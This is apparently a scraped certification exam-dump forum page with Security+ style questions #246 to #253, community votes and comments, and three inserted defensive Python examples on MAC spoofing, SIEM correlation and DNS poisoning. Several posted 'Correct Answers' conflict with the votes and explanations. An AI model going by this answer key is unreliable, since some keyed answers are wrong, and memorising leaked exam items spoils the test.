EIP is a register in x86 architectures (32bit). It holds the "Extended Instruction Pointer" for the stack. In other words, it tells the computer where to
go next to execute the next command and controls the flow of a program.
upvoted 1 times

  andrizo 3 months, 3 weeks ago


What's an EIP?
upvoted 1 times

  Gino_Slim 3 months, 1 week ago


EIP stands for Extended Instruction Pointer and is used to track the address of the current instruction running inside the application.
upvoted 1 times

  Granddude 3 months, 3 weeks ago


Selected Answer: C
https://www.imperva.com/learn/application-security/buffer-
A buffer overflow (or buffer overrun) occurs when the volume of data exceeds the
storage capacity of the memory buffer. As a result, the program attempting to write the data to the buffer overwrites adjacent memory locations.
upvoted 3 times


Question #246 Topic 1

Server administrators want to configure a cloud solution so that computing memory and processor usage is maximized most efficiently across a
number of virtual servers. They also need to avoid potential denial-of-service situations caused by availability. Which of the following should
administrators configure to maximize system availability while efficiently utilizing available computing power?

A. Dynamic resource allocation

B. High availability

C. Segmentation

D. Container security

Correct Answer: A

Community vote distribution


A (100%)

  FMMIR 1 month, 3 weeks ago


Selected Answer: A
To maximize system availability and efficiently utilize available computing power, administrators should configure dynamic resource allocation.
Dynamic resource allocation is a technique that allows a system to automatically adjust the allocation of resources, such as memory and
processing power, to different applications or processes in response to changing workloads or conditions. This can help to ensure that
computing resources are used efficiently and that the system is able to respond to changes in demand without encountering performance issues
or becoming unavailable.
upvoted 2 times

  Gino_Slim 3 months, 1 week ago


Selected Answer: A
If they need to scale usage upwards and downwards A is the only one that makes sense here.
upvoted 3 times

  jspecht 3 months, 2 weeks ago


Selected Answer: A
Dynamic resource allocation lets you scale resources up or down as needed to be more efficient.
upvoted 3 times


Question #247 Topic 1

While reviewing the wireless router, a systems administrator of a small business determines someone is spoofing the MAC address of an
authorized device. Given the table below:

Which of the following should be the administrator’s NEXT step to detect if there is a rogue system without impacting availability?

A. Conduct a ping sweep.

B. Physically check each system.

C. Deny internet access to the "UNKNOWN" hostname.

D. Apply MAC filtering.

Correct Answer: D

Community vote distribution


A (66%) B (29%) 5%

  passmemo Highly Voted  3 months, 3 weeks ago


Selected Answer: A
NEED FOR PING SWEEP
Ping sweep is used for various purposes, such as improving and maintaining network security. It can also be used to:

Discover active IP addresses on the network
Ensure IP addresses on the network match the documentation
Detect rogue devices connected to the network
upvoted 11 times

  NXPERT 3 months, 2 weeks ago


the "Unknown" device is already discovered, you don't need ping sweep to detect it again.
upvoted 5 times

  Sandon 1 week, 2 days ago


"NEXT step to detect" The question is literally asking you to DETECT
upvoted 2 times

  Littlelarry123 3 months, 2 weeks ago


I agree with you, plus it also says without impacting availability. You can just do a ping without affecting anyone's work. Going to physically check
affects availability. It looks like the people who picked B are drunk.
upvoted 2 times

  Kashim Highly Voted  3 months, 4 weeks ago


Selected Answer: B
If it is a small office "B. Physically check each system. " should be done, as it seems to be the most accurate.
upvoted 5 times

  Ranaer Most Recent  2 weeks, 2 days ago


Selected Answer: A
B is a stupid answer. It's a Wi-Fi network. Yeah, you can go check all the devices in the office, but what if the malicious machine is in the parking lot
below the windows of the office???? You will go and check every single machine in range of the WAP? It's absurd.
You do a ping sweep, determine which machines are connected right now and work from there.
upvoted 2 times

  Blueteam 2 months, 1 week ago


Option A is the first step.
Is there an unknown device connected to the network now?
Let's see by conducting a ping sweep.
upvoted 1 times


  rodwave 2 months, 3 weeks ago


Selected Answer: C
Answer: Deny internet access to the "UNKNOWN" hostname.

The unknown host has been discovered, so there's no need to detect it again; just deny access.
=====================

(A) A ping sweep (also known as an ICMP sweep) is a basic network scanning technique used to determine which of a range of IP addresses
map to live hosts on the network. We don't need to do this since the UNKNOWN host has been identified already

(B) No

(D) The scenario mentioned how the MAC address was spoofed so filtering by MAC addresses won't help here
upvoted 2 times

  Ashbash95 2 months, 4 weeks ago


Selected Answer: B
Answer is b
upvoted 2 times

  Knowledge33 2 months, 4 weeks ago


Selected Answer: A
I don't understand why some guys prefer response B. How is it possible to locate all devices? We're talking about Wi-Fi. The administrator can't
know the location of all devices. Even though the administrator can physically check anything, what should he check? The Android network
config? The Apple network config? If he isn't familiar with an OS, how can he do it? Response B is totally false.
upvoted 3 times

  J_Ark1 3 months ago


Selected Answer: A
Ping sweep detects networks and reveals devices connected. B doesn't make sense because it says that it is a wireless network, so how can
you physically go around checking every single device connected to the network? Imagine if it were a company employing over 1000 staff. Ping
sweep to me makes sense in this situation. MAC filtering would restrict access, so no to that via process of elimination.
upvoted 3 times

  comeragh 3 months, 1 week ago


Selected Answer: B
I would go with B here and on previous 601 exam this question listed physically check each system as best answer as per discussions
upvoted 1 times

  Gino_Slim 3 months, 1 week ago


MAC filtering won't help with a spoofed MAC address.
upvoted 1 times

  Gino_Slim 3 months, 1 week ago


Selected Answer: A
It's a ping sweep even though it seems odd dealing with MAC addresses. It's the only one that makes sense too

In addition to identifying active devices on a network, ping sweeps are also helpful at detecting unrecognized devices that may be malicious and
ensuring devices are functioning correctly.
upvoted 2 times

  ostralo 3 months, 2 weeks ago


Selected Answer: A
It is a wireless network and we might not know where those devices are located.
The question mentioned that it is a small business, but we cannot assume that there are only 4~10 devices.

Visiting each post to do ipconfig isn't efficient enough.

I would perform a ping sweep against all the known hosts and compare it with the ARP table.
upvoted 4 times
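
The comparison step that follows the sweep can be done entirely offline. The block below is an added example, not from the page: since the router table in the question is not reproduced here, it uses a constructed client table (with the "UNKNOWN" hostname row) and a constructed ARP snapshot taken after the sweep, both with made-up locally administered MAC addresses. It reports MACs that now answer for more than one IP, IPs that are not on the authorized list, and which authorized host the duplicated MAC belongs to. It sends no traffic itself.

```python
"""Detect a spoofed MAC address by comparing the router's client table with
an ARP snapshot taken after a ping sweep.

Added example, not from the original page. Both tables are constructed; the
page's own router table is not reproduced there. The check sends nothing on
the wire, it only compares the two views.
"""
from collections import defaultdict

# Constructed: what the wireless router's client table showed
ROUTER_TABLE = [
    {"hostname": "router",    "mac": "AA:BB:CC:FF:FF:FE", "ip": "192.168.1.1"},
    {"hostname": "laptop-01", "mac": "AA:BB:CC:00:00:01", "ip": "192.168.1.10"},
    {"hostname": "printer",   "mac": "AA:BB:CC:00:00:02", "ip": "192.168.1.11"},
    {"hostname": "phone-ceo", "mac": "AA:BB:CC:00:00:03", "ip": "192.168.1.12"},
    {"hostname": "UNKNOWN",   "mac": "AA:BB:CC:00:00:03", "ip": "192.168.1.57"},
]

# Constructed: ARP neighbour table captured right after the ping sweep
ARP_AFTER_SWEEP = """\
192.168.1.1   aa:bb:cc:ff:ff:fe
192.168.1.10  aa:bb:cc:00:00:01
192.168.1.11  aa:bb:cc:00:00:02
192.168.1.12  aa:bb:cc:00:00:03
192.168.1.57  aa:bb:cc:00:00:03
"""


def norm(mac: str) -> str:
    """Normalise case and separator so tables from different tools compare."""
    return mac.lower().replace("-", ":")


def parse_arp(text: str) -> dict:
    """'ip mac' lines -> {ip: mac}."""
    table = {}
    for line in text.splitlines():
        if line.strip():
            ip, mac = line.split()
            table[ip] = norm(mac)
    return table


def authorized(inventory: list) -> dict:
    """{ip: mac} for rows the router could name; UNKNOWN rows are not trusted."""
    return {row["ip"]: norm(row["mac"]) for row in inventory if row["hostname"] != "UNKNOWN"}


def duplicate_macs(arp: dict) -> dict:
    """MACs that answer for more than one IP at the same time."""
    by_mac = defaultdict(list)
    for ip, mac in arp.items():
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


def unlisted_ips(arp: dict, inventory: list) -> list:
    """IPs seen on the wire whose MAC does not match an authorized entry."""
    auth = authorized(inventory)
    return sorted(ip for ip, mac in arp.items() if auth.get(ip) != mac)


def owner_of(mac: str, inventory: list) -> list:
    """Authorized hostnames registered with this MAC (who is being impersonated)."""
    return sorted({row["hostname"] for row in inventory
                   if norm(row["mac"]) == norm(mac) and row["hostname"] != "UNKNOWN"})


def analyze(arp_text: str = ARP_AFTER_SWEEP, inventory: list = ROUTER_TABLE) -> dict:
    arp = parse_arp(arp_text)
    dups = duplicate_macs(arp)
    return {
        "duplicate_macs": dups,
        "unlisted_ips": unlisted_ips(arp, inventory),
        "impersonated": {mac: owner_of(mac, inventory) for mac in dups},
    }


if __name__ == "__main__":
    for key, value in analyze().items():
        print(f"{key}: {value}")
```

A duplicated MAC with two live IPs is the strongest signal here; a single mismatched IP on its own could just be a DHCP lease that moved, so the two findings are reported separately rather than merged.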

  andrizo 3 months, 3 weeks ago


I don't like this question; MAC spoofing usually means repeated MAC addresses.
upvoted 2 times

  serginljr 3 months, 4 weeks ago


Selected Answer: B
B correct
upvoted 2 times

  Ha9ate 3 months, 4 weeks ago


Selected Answer: B
Agree B
upvoted 1 times

Question #248 Topic 1

A security analyst in a SOC has been tasked with onboarding a new network into the SIEM. Which of the following BEST describes the information
that should feed into a SIEM solution in order to adequately support an investigation?

A. Logs from each device type and security layer to provide correlation of events

B. Only firewall logs since that is where attackers will most likely try to breach the network

C. Email and web-browsing logs because user behavior is often the cause of security breaches

D. NetFlow because it is much more reliable to analyze than syslog and will be exportable from every device

Correct Answer: B

Community vote distribution


A (100%)

  Kashim Highly Voted  3 months, 4 weeks ago


Selected Answer: A
SIEM works best only if it has "A. Logs from each device type and security layer to provide correlation of events".

Firewall logs are not enough during the IR process.
upvoted 11 times

  Sir_Learnalot Most Recent  3 months ago


Selected Answer: A
"A" should be the right exam answer. In the real world, you might have to be a bit more picky which logs to choose, as you'd have limitations like
EPS-based licenses for your SIEM or limited hardware resources, so it's not always the best solution to feed everything to your SIEM.
upvoted 1 times

  Picvet 3 months, 1 week ago


B may be the answer because we are talking about a new network. Network is associated with firewall based rules.
upvoted 1 times

  Gino_Slim 3 months, 1 week ago


Nah. Firewalls are also not the only way an attacker can access resources either.
upvoted 2 times

  nobnarb 3 months, 2 weeks ago


Selected Answer: A
I think it's A because SIEM needs massive amounts of information to be efficient.
B is wrong because it says ONLY firewall logs, which would not give you enough information to respond to the totality of a circumstance.
upvoted 4 times
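
Why "only firewall logs" falls short is easiest to see with a small correlation run. The block below is an added example, not from the page or any SIEM product: three constructed log sources (a firewall, a VPN authentication log and an endpoint agent, all in made-up formats) are normalised into one event list, and a timeline for one external IP is built by pivoting first on the source IP and then on the user name, which is the only field the endpoint log shares with the others. The firewall-only view of the same IP is returned alongside for contrast.

```python
"""Cross-source correlation of the kind a SIEM does once it receives logs
from every device type and security layer.

Added example, not from the original page or any SIEM product. All three
log sources and their line formats are constructed. Correlation pivots on
source IP, then on the user seen logging in from that IP, so that endpoint
events (which carry no IP) are pulled into the same timeline.
"""
from datetime import datetime, timedelta, timezone

FIREWALL_LOG = [
    "2023-02-04T07:20:05Z fw01 ACCEPT TCP 198.51.100.23:51022 -> 10.0.5.12:443",
    "2023-02-04T07:20:06Z fw01 ACCEPT TCP 10.0.1.40:49877 -> 10.0.5.12:443",
]
AUTH_LOG = [
    "2023-02-04T07:20:09Z vpn01 login-failed user=jsmith src=198.51.100.23",
    "2023-02-04T07:20:31Z vpn01 login-ok user=jsmith src=198.51.100.23",
    "2023-02-04T07:25:00Z vpn01 login-ok user=alee src=10.0.1.40",
]
ENDPOINT_LOG = [
    "2023-02-04T07:21:02Z host-12 new-service name=updsvc user=jsmith",
    "2023-02-04T09:00:00Z host-07 new-service name=backup user=alee",
]


def parse_ts(text: str) -> datetime:
    return datetime.strptime(text, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def parse_firewall(line: str) -> dict:
    t, dev, action, proto, src, _, dst = line.split()
    return {"ts": parse_ts(t), "source": dev, "src_ip": src.rsplit(":", 1)[0],
            "user": None, "detail": f"{action} {proto} to {dst}"}


def parse_auth(line: str) -> dict:
    t, dev, event, *kv = line.split()
    f = dict(x.split("=", 1) for x in kv)
    return {"ts": parse_ts(t), "source": dev, "src_ip": f["src"],
            "user": f["user"], "detail": event}


def parse_endpoint(line: str) -> dict:
    t, dev, event, *kv = line.split()
    f = dict(x.split("=", 1) for x in kv)
    return {"ts": parse_ts(t), "source": dev, "src_ip": None,
            "user": f["user"], "detail": f"{event} {f['name']}"}


def all_events() -> list:
    """One normalised, time-ordered event list across every source."""
    events = [parse_firewall(line) for line in FIREWALL_LOG]
    events += [parse_auth(line) for line in AUTH_LOG]
    events += [parse_endpoint(line) for line in ENDPOINT_LOG]
    return sorted(events, key=lambda e: e["ts"])


def firewall_only_view(ip: str) -> list:
    """What an analyst sees when the SIEM holds nothing but firewall logs."""
    return [(e["ts"].strftime("%H:%M:%S"), e["source"], e["detail"])
            for e in all_events() if e["source"] == "fw01" and e["src_ip"] == ip]


def timeline_for_ip(ip: str, window: timedelta = timedelta(minutes=30)) -> list:
    """Events tied to ip directly, plus events of any user who authenticated
    from it, within a window after the first sighting of the ip."""
    events = all_events()
    direct = [e for e in events if e["src_ip"] == ip]
    if not direct:
        return []
    start = direct[0]["ts"]
    users = {e["user"] for e in direct if e["user"]}
    related = [e for e in events
               if (e["src_ip"] == ip or e["user"] in users)
               and start <= e["ts"] <= start + window]
    return [(e["ts"].strftime("%H:%M:%S"), e["source"], e["detail"]) for e in related]


if __name__ == "__main__":
    print("firewall only:", firewall_only_view("198.51.100.23"))
    for row in timeline_for_ip("198.51.100.23"):
        print(*row)
```

The firewall alone shows one accepted HTTPS session; with the VPN and endpoint layers in the same store, the same IP becomes a failed login, a successful login and a new service created under that user two minutes later, which is the context an investigation actually needs.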


Question #249 Topic 1

An organization just implemented a new security system. Local laws state that citizens must be notified prior to encountering the detection
mechanism to deter malicious activities. Which of the following is being implemented?

A. Proximity cards with guards

B. Fence with electricity

C. Drones with alarms

D. Motion sensors with signage

Correct Answer: D

Community vote distribution


D (84%) Other

  Ha9ate Highly Voted  3 months, 4 weeks ago


Selected Answer: D
I think D is correct.
"must be notified prior to encountering the detection mechanism"
notified = signage
detection = sensors
upvoted 13 times

  Dachosenone Highly Voted  3 months, 3 weeks ago


Personal tip: Don't pee on an electrical fence.
upvoted 12 times

  Gino_Slim 3 months, 1 week ago


That's solid advice. I appreciate that.
upvoted 2 times

  Sir_Learnalot Most Recent  2 months, 3 weeks ago


Selected Answer: C
Not sure about this, but C would for me be something you should inform your citizens about. I know at least in Europe there are strong
regulations for usage of drones, and I could understand that you need to inform citizens about them when you want to use them. But open for
discussion... I'm really not sure about this one.
upvoted 1 times

  Sandon 1 week, 2 days ago


That ain't it buddy
upvoted 1 times

  Jay007006 3 months, 1 week ago


I'm confused by the answers given here. I've never once seen a sign warning of motion sensors. Electric fences, on the other hand, are always
labeled.
upvoted 1 times

  nobnarb 3 months, 2 weeks ago


Selected Answer: D
The question states they must be NOTIFIED. A fence definitely won't whisper in your ear.
upvoted 5 times

  Granddude 3 months, 3 weeks ago


Selected Answer: D
B would be a deterrent. D is detection
upvoted 3 times

  Skelter117 3 months, 3 weeks ago


Signage is a deterrent. Motion sensors are detective.
upvoted 1 times

  chipdomcobb 3 months, 4 weeks ago


I think D is correct. The question says that "citizens must be notified prior to encountering the detection mechanism".
upvoted 2 times

  Kashim 3 months, 4 weeks ago


Selected Answer: B


Only "B. Fence with electricity" can be harmful for individuals, so I think it is the best option here.
upvoted 3 times

  andrizo 3 months, 3 weeks ago


Does not detect
upvoted 4 times


Question #250 Topic 1

An IT security manager requests a report on company information that is publicly available. The manager's concern is that malicious actors will be
able to access the data without engaging in active reconnaissance. Which of the following is the MOST efficient approach to perform the analysis?

A. Provide a domain parameter to theHarvester tool.

B. Check public DNS entries using dnsenum.

C. Perform a Nessus vulnerability scan targeting a public company’s IP.

D. Execute nmap using the options: scan all ports and sneaky mode.

Correct Answer: B

Community vote distribution


A (96%) 4%

  Kashim Highly Voted  3 months, 4 weeks ago


Selected Answer: A
https://www.kali.org/tools/theharvester/
upvoted 11 times

  [Removed] Highly Voted  3 months, 4 weeks ago


Selected Answer: A
theharvester
The package contains a tool for gathering subdomain names, e-mail addresses, virtual hosts, open ports/ banners, and employee names from
different public sources (search engines, pgp key servers). kashim
upvoted 8 times

  nicekoda Most Recent  1 month, 1 week ago


A and B are used for passive information gathering, but theHarvester tool is used for searching emails. The correct answer is B. Others are for
active information gathering
upvoted 1 times

  Sandon 1 week, 2 days ago


No sir, that ain't it.
upvoted 1 times

  [Removed] 1 month, 3 weeks ago


I would like to vote for A, but my thinking is... Is this the most practical solution? Harvester tool = Python... I guess I'm trying to compare A and
B. Even though both answers make sense in a way, I'm trying to figure out what could be the best solution from the practicality and basic
perspectives of cyber security...
upvoted 1 times

  mmains 2 months, 1 week ago


Selected Answer: A
theharvester
The package contains a tool for gathering subdomain names, e-mail addresses, virtual hosts, open ports/ banners, and employee names from
different public sources (search engines, pgp key servers).
upvoted 1 times

  Blueteam 2 months, 1 week ago


The answer is A.
The question is about active and non active recon. Only option A fits.
upvoted 2 times

  Sir_Learnalot 2 months, 3 weeks ago


Selected Answer: A
A should be the right answer here
upvoted 1 times

  Ty92503 3 months ago


Selected Answer: B
DNS enumeration is the process of locating all the DNS servers and their corresponding records for an organization. DNS enumeration will yield
usernames, computer names, and IP addresses of potential target systems.
upvoted 1 times

  Sandon 1 week, 2 days ago


Try again


upvoted 1 times

  Samsonite363 1 week ago


Do you have anything to add to people's comments besides 2 or 3 word responses saying they're wrong? Add some insight or
explanations behind your accusations if you think the answer they suggest is incorrect
upvoted 3 times

  J_Ark1 3 months ago


Selected Answer: A
I saw the word "Parameter" and went for A because it suggested that the gathered data would be protected from a malicious actor.
upvoted 2 times


Question #251 Topic 1

Which of the following environments utilizes dummy data and is MOST likely to be installed locally on a system that allows code to be assessed
directly and modified easily with each build?

A. Production

B. Test

C. Staging

D. Development

Correct Answer: B

Community vote distribution


D (68%) B (27%) 5%

  Granddude Highly Voted  3 months, 3 weeks ago


Selected Answer: D
Correction (D). Development.
upvoted 6 times

  asum Most Recent  2 weeks, 4 days ago


Selected Answer: C
• Development—the code will be hosted on a secure server. Each developer will check
out a portion of code for editing on his or her local machine. The local machine will
normally be configured with a sandbox for local testing. This ensures that whatever
other processes are being run locally do not interfere with or compromise the
application being developed.
• Test/integration—in this environment, code from multiple developers is merged
to a single master copy and subjected to basic unit and functional tests (either
automated or by human testers). These tests aim to ensure that the code builds
correctly and fulfills the functions required by the design.
• Staging—this is a mirror of the production environment but may use test or sample
data and will have additional access controls so that it is only accessible to test
users. Testing at this stage will focus more on usability and performance.
upvoted 1 times

  Sandon 1 week, 2 days ago


No sir
upvoted 1 times

  alwaysrollin247 1 month, 1 week ago


Selected Answer: B
Development -Software developers use a development environment to create the application. This typically includes version control and change
management controls to track the application development.

Test - Testers put the application through its paces and attempt to discover any bugs or errors. The testing environment typically doesn’t simulate
a full production environment, but instead includes enough hardware and software to test software modules.

Staging - The staging environment simulates the production environment and is used for late stage testing. It provides a complete but
independent copy of the production environment.

The production environment is the final product. It includes everything needed to support the application and allow customers and others to use
it. In this example, it would include the live web server, possibly a back-end database server, and Internet access.
upvoted 1 times

  Sandon 1 week, 2 days ago


That ain't it buddy
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: D
The correct answer is D. Development.

Development environments are typically used for building and testing software applications. They often use dummy or sample data, and are
usually installed locally on a system where code can be easily accessed and modified during the development process. This allows developers to
test and debug their code without affecting the production environment.

Production environments, on the other hand, are the live environments where software applications are deployed and used by end-users. They
typically use real data and are not intended for testing or development purposes.

Test and staging environments are also used for testing and debugging, but they are typically more similar to production environments in terms of
the data and configurations they use. These environments are often used to perform final testing before deploying an application to the
production environment.
upvoted 1 times
  carpathia 2 months, 1 week ago
Selected Answer: D
pg 252. D Gibson.
upvoted 1 times

  Blueteam 1 month, 4 weeks ago


https://analystanswers.com/dummy-data-definition-example-how-to-generate-it/
Dummy data is mock data generated at random as a substitute for live data in testing environments.
upvoted 1 times

  Blueteam 2 months, 1 week ago


Correct answer is B. Testing environment.
Dummy data is mock data generated at random as a substitute for live data in testing environments. Dummy data is used for testing new
programs and testing modifications on existing programs.
upvoted 1 times

  carpathia 2 months, 3 weeks ago


Selected Answer: D
Apparently:

https://michaelstivala.com/why-dummy-data-matters-and-how-to-generate-it/

Google for environment dummy data


upvoted 1 times

  Sir_Learnalot 2 months, 3 weeks ago


Selected Answer: D
I'll go with development. Testing will already be used to test integration with other services and stuff... as long as you are playing around, you'll do
that in development, and that's most often done locally
upvoted 1 times

  ksave 2 months, 3 weeks ago


Selected Answer: B
Since the question does not mention automation (CI/CD) way of working, I believe it is testing
upvoted 1 times

  Knowledge33 2 months, 4 weeks ago


Selected Answer: D
Development -> Testing -> Staging -> Production
upvoted 1 times

  ostralo 3 months, 2 weeks ago


The elements of a test environment include the following:
* The software to be tested
* Test data
* Network configuration
* Device on which the software is to be tested
* Database server
upvoted 1 times

  ostralo 3 months, 2 weeks ago


If there is a test failure, the faulty code can be removed in this environment. Thus, testers can ensure the quality of the code by finding any
bugs and reviewing all bug fixes. However, if all tests pass, the test environment can automatically move the code to the next deployment
environment.
upvoted 1 times

  PCTAN 3 months, 2 weeks ago


Selected Answer: B
I believe it is B since you don't update code in TEST environment. TEST environment is meant for testing only.
upvoted 2 times

  03allen 3 months, 1 week ago


so, what do you call if you fix bugs during the TEST stage? Development again?
upvoted 1 times

  PCTAN 3 months, 2 weeks ago


Sorry, I meant answer is D
upvoted 1 times


  passmemo 3 months, 3 weeks ago


Selected Answer: D
Development
You can easily make changes
upvoted 4 times

  Granddude 3 months, 3 weeks ago


Selected Answer: B
The old dump conversations show B to be the answer by the majority.
upvoted 2 times


Question #252 Topic 1

An analyst receives multiple alerts for beaconing activity for a host on the network. After analyzing the activity, the analyst observes the following
activity:

* A user enters comptia.org into a web browser.


* The website that appears is not the comptia.org site.
* The website is a malicious site from the attacker.
* Users in a different office are not having this issue.

Which of the following types of attacks was observed?

A. On-path attack

B. DNS poisoning

C. Locator (URL) redirection

D. Domain hijacking

Correct Answer: C

Community vote distribution


B (65%) C (35%)

  Ha9ate Highly Voted  3 months, 4 weeks ago


Selected Answer: B
Only some clients have this problem with the web turning to a malicious site.
So choose B.
upvoted 10 times

  Action Most Recent  9 hours, 27 minutes ago


Selected Answer: C
It’s not affecting other users so it’s C. Wouldn’t DNS poisoning affect other users ?
upvoted 1 times

  mike47 5 days ago


Selected Answer: B
This is the reason why the answer is 100% B:
A. On-path attack - sits in the middle of two stations changing data that comes across the path. - This is not the answer.
B. DNS poisoning - Hacker reroutes traffic from the legitimate site to a fake version. This is what happened here. When the user went to CompTIA.org, he
went to the fake version because the legitimate DNS address/records/info for that site was changed at his site specifically. - This is the correct answer.
C. Locator (URL) redirection - clicks on a link and is redirected to a malicious website. A URL was not clicked on in this question. A domain was
typed in: Comptia.org. And also redirection was not described in this question. This is not the answer.
D. Domain hijacking - Website address is completely stolen by another party. The question clearly states that "users from a different office are
not having this problem". If the users were having the problem, then this would mean that the website was stolen. But because other users
at other locations are not having the problem: This is not the answer.

B. DNS poisoning is the only correct answer 100%


upvoted 1 times

  Sandon 1 week, 2 days ago


According to ChatGPT

B. DNS poisoning

DNS poisoning, also known as DNS spoofing or DNS cache poisoning, is a type of attack in which an attacker alters the mapping of a domain
name to an IP address. In this case, the analyst observed that a user enters comptia.org into a web browser, but the website that appears is not
the actual comptia.org site. Instead, it's a malicious site controlled by the attacker. This behavior indicates that the attacker has poisoned the
DNS server, causing the server to return the wrong IP address for the domain name comptia.org. This attack is also known as DNS Cache
Poisoning.

An on-path attack is an attack that intercepts and alters network traffic in transit.
Locator (URL) redirection is a technique used to redirect a web page request to a different web page.
Domain hijacking is an attack in which an attacker gains unauthorized access to a domain name registrar account, allowing them to change the
DNS records and take control of a domain name.
upvoted 1 times

  Ranaer 2 weeks, 2 days ago


Selected Answer: B
Everyone saying that others don't have the same issue, thus it can't be DNS poisoning, doesn't seem to realize that local networks also have a DNS
cache, which can be poisoned. You don't query every single time someone puts a link into their browser, it's so much pointless traffic; when one
user goes to facebook, the local DNS cache has that information for the next 24 hours, and if another user goes to the same site, they get the IP from
the local DNS cache. People in the other office, that might be 1-3-5-100-1000 km away, do NOT use the same local DNS cache, since it's
unlikely they are on the same network.
upvoted 1 times
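To make the "who is affected" reasoning in mike47's and Ranaer's comments concrete, here is an added Python example (not from the thread or the exam): it compares the A records each office's resolver returns for comptia.org with the authoritative answer and inspects the affected host's hosts file, so the scope of the wrong mapping (one host, one site's cache, or everywhere) drives the verdict. All resolver names, IP addresses and hosts-file lines are constructed.

```python
import ipaddress

# Constructed data for the example. Addresses come from the documentation ranges.
AUTHORITATIVE = {"comptia.org": {"198.51.100.10"}}   # what the zone really publishes

# A records observed from each office's resolver (one per site) plus a public one.
OBSERVED = {
    "office-A-resolver": {"comptia.org": {"203.0.113.66"}},   # poisoned cache
    "office-B-resolver": {"comptia.org": {"198.51.100.10"}},
    "public-resolver": {"comptia.org": {"198.51.100.10"}},
}

# hosts file pulled from the beaconing host (constructed).
HOSTS_FILE = """\
127.0.0.1       localhost
# planted override: bypasses DNS entirely on this one machine
203.0.113.66    comptia.org www.comptia.org
"""


def parse_hosts(text):
    """Parse hosts(5) content into {hostname: {ip, ...}}, skipping comments and junk."""
    table = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        ip, *names = line.split()
        try:
            ipaddress.ip_address(ip)
        except ValueError:
            continue  # malformed line, not an address
        for name in names:
            table.setdefault(name.lower(), set()).add(ip)
    return table


def divergent_sources(domain, observed, authoritative):
    """{source: unexpected_ips} for each resolver returning addresses the zone does not publish."""
    expected = authoritative.get(domain, set())
    bad = {}
    for source, answers in observed.items():
        unexpected = answers.get(domain, set()) - expected
        if unexpected:
            bad[source] = unexpected
    return bad


def assess(domain, observed, hosts_text, authoritative):
    """Locate where the wrong name-to-address mapping lives.

    single-host : the affected machine's hosts file overrides the name
    single-site : only some resolvers answer wrongly (a poisoned cache at that site)
    widespread  : every resolver answers wrongly (the published data itself changed)
    clean       : all answers match the authoritative zone
    """
    expected = authoritative.get(domain, set())
    host_override = parse_hosts(hosts_text).get(domain.lower(), set()) - expected
    bad = divergent_sources(domain, observed, authoritative)
    if host_override:
        scope = "single-host"
    elif bad and len(bad) < len(observed):
        scope = "single-site"
    elif bad:
        scope = "widespread"
    else:
        scope = "clean"
    return {"domain": domain, "scope": scope,
            "hosts_override": host_override, "divergent": bad}


if __name__ == "__main__":
    print(assess("comptia.org", OBSERVED, HOSTS_FILE, AUTHORITATIVE))
    print(assess("comptia.org", OBSERVED, "", AUTHORITATIVE))
```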

  [Removed] 1 month, 3 weeks ago


Selected Answer: C
Other users are not having the same issue…
upvoted 2 times

  Juraj22 2 months ago


Selected Answer: C
Yes, but it should be C, because other users don't have these problems. If the problems were on the DNS server, then other users should have problems
too... this information is probably most important for our choice. I am OK with C.
upvoted 4 times

  Sir_Learnalot 2 months, 3 weeks ago


Selected Answer: B
B is most likely the case here. With a URL redirection attack the attacker would give a user a malicious link or something which redirects the user
once clicked... but in this case it reads more like a DNS poisoning attack to me, performed on the host (maybe by using the hosts file)
upvoted 2 times

  Knowledge33 2 months, 4 weeks ago


Selected Answer: B
The response is B, not D.
DNS poisoning --> When the user requests a DNS resolution, a malicious server replies, and not the legitimate DNS server.
Domain hijacking --> An attacker has configured a bad entry in the DNS server (malicious IP). Then, all hierarchical DNS servers have this bad
entry which redirects all users (worldwide) to the malicious website.
upvoted 1 times

  G4ct756 3 months, 1 week ago


Selected Answer: B
Definitely B, because the user types out the site address correctly but gets directed to a malicious site.
> likely the DNS record is poisoned.
not A, a MITM attacker usually intercepts a user visiting a legit website.
not C, as the user typed the site address correctly instead of clicking a malicious link.
not D, the attacker would have taken over a legit site.
upvoted 2 times

  Gino_Slim 3 months, 1 week ago


Selected Answer: B
After some research, it's B.

It's B and not D because the user is actually typing the url into the browser. That's a DNS change on their machine specifically.

URL redirection is normally done through phishing and those means to mimic a legitimate site. Not from the user typing in the URL. That's the
key part of the question.
upvoted 3 times

  ostralo 3 months, 2 weeks ago


Selected Answer: B
DNS 100%
upvoted 1 times

  ergo54 3 months, 3 weeks ago


Selected Answer: C
"The indicator of a successful URL redirection attack is simple. You attempt to go to a website, and you're redirected to another website." -Darril
Gibson
upvoted 3 times

  Granddude 3 months, 3 weeks ago


Selected Answer: C
https://www.virtuesecurity.com/kb/url-redirection-attack-and-
defense/#:~:text=URL%20Redirection%20is%20a%20vulnerability,redirected%20to%20the%20malicious%20website.

URL Redirection is a vulnerability which allows an attacker to force users of your application to an untrusted external site. The attack is most
often performed by delivering a link to the victim, who then clicks the link and is unknowingly redirected to the malicious website.
upvoted 3 times

  andrizo 3 months, 3 weeks ago


Does not affect other computers
upvoted 1 times
  Skelter117 3 months, 3 weeks ago
I could be wrong but I believe if you were redirected the url would change to whatever that site was called and not still be called the original
website you typed in. Thoughts?
upvoted 1 times

  ksave 3 months, 3 weeks ago


Selected Answer: B
DNS cache has been poisoned.
upvoted 3 times


Question #253 Topic 1

Which of the following in the incident response process is the BEST approach to improve the speed of the identification phase?

A. Activate verbose logging in all critical assets.

B. Tune monitoring in order to reduce false positive rates.

C. Redirect all events to multiple syslog servers.

D. Increase the number of sensors present on the environment.

Correct Answer: B

Community vote distribution


B (53%) A (24%) D (24%)

  Sir_Learnalot Highly Voted  2 months, 3 weeks ago


Selected Answer: B
In the incident response process the identification phase is used to recognize whether an event that occurs should be classified as an incident.
Therefore false positive tuning would increase the identification time, as A and D would give you more insights, but also more FP and therefore it
makes it harder to identify real incidents... I'll go with "B"
upvoted 6 times

  ronniehaang Most Recent  3 days, 22 hours ago


Selected Answer: B
B. Tune monitoring in order to reduce false positive rates.

Improving the speed of the identification phase in incident response process involves reducing the amount of data that has to be analyzed to find
the incident. Tuning monitoring to reduce false positive rates helps to achieve this goal by reducing the amount of noise in the logs and alerts that
have to be analyzed. This means that only the most relevant data is being evaluated, which can significantly reduce the time it takes to identify an
